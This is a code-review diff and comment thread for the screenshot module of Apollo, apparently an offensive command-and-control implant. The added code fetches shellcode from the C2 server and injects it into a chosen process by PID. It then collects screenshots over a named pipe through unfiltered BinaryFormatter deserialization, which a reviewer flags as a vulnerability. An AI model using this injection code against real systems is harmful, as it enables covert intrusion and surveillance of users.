Payload_Type/Apollo/agent_code/Apollo/CommandModules/Screenshot.cs

```diff
@@ -30,43 +36,126 @@ public class Screenshot
+            JObject json = (JObject)JsonConvert.DeserializeObject(task.parameters);
+
+            ////
+            // Parameter Checks
+            ////
+
+            loaderStubID = json.Value<string>("loader_stub_id");
+            // Reset the loader stub each time as a new named pipe is given to us from on high.
+            loaderStub = null;
+            loaderStub = agent.Profile.GetFile(task.id, loaderStubID, agent.Profile.ChunkSize);
+            if (loaderStub == null || loaderStub.Length == 0)
             {
-                SendCapture(implant, job, screenshot);
-                job.SetComplete();
-            } else
+                job.SetError(String.Format("Unable to retrieve assembly loader shellcode stub with ID {0}", loaderStubID));
+                return;
+            }
+
+            pipeName = json.Value<string>("pipe_name");
+            if (pipeName == "")
             {
-                job.SetError("Failed to take screenshot of the screen.");
+                job.SetError("No pipe name was given to connect to (server error).");
+                return;
             }
-            
-        }
 
+            pid = json.Value<int>("pid");
 
-        public static byte[] TakeScreenShot()
-        {
-            Bitmap bmp = new Bitmap(Screen.PrimaryScreen.Bounds.Width, Screen.PrimaryScreen.Bounds.Height);
-            //Bitmap bmp = new Bitmap(1920, 1080);
-            Bitmap res = null;
-            //Size pt = new Size(1920, 1080);
-            byte[] screenshot = null;
-            using (Graphics g = Graphics.FromImage(bmp))
+            if (pid < 0)
             {
-                try
+                job.SetError("Invalid PID given (pid < 0).");
+                return;
+            }
+
+            try
+            {
+                var temp = System.Diagnostics.Process.GetProcessById(pid);
+            }
+            catch (Exception ex)
+            {
+                job.SetError($"Failed to get process with pid {pid}. Reason: {ex.Message}");
+                return;
+            }
+
+
+            ////
+            //  Execution
+            ////
+
+            try
+            {
+
+                ApolloTaskResponse response;
+                var injectionType = Injection.InjectionTechnique.GetInjectionTechnique();
+                var injectionHandler = (Injection.InjectionTechnique)Activator.CreateInstance(injectionType, new object[] { loaderStub, (uint)pid });
+
+                if (injectionHandler.Inject())
                 {
-                    g.CopyFromScreen(0, 0, 0, 0, bmp.Size);
-                    using (MemoryStream ms = new MemoryStream())
+
+                    NamedPipeClientStream pipeClient = new NamedPipeClientStream(pipeName);
+                    pipeClient.Connect(30000);
+
+                    BinaryFormatter bf = new BinaryFormatter();
+
+                    try
+                    {
+                        screenShots = (List<byte[]>)bf.Deserialize(pipeClient);
```

Comment:
Without an IPC message and applied fitler, this introduces a vulnerability and doesn't allow the module to communicate verbose error messages as to what went wrong.

Reply:
Fixed in 389f9c3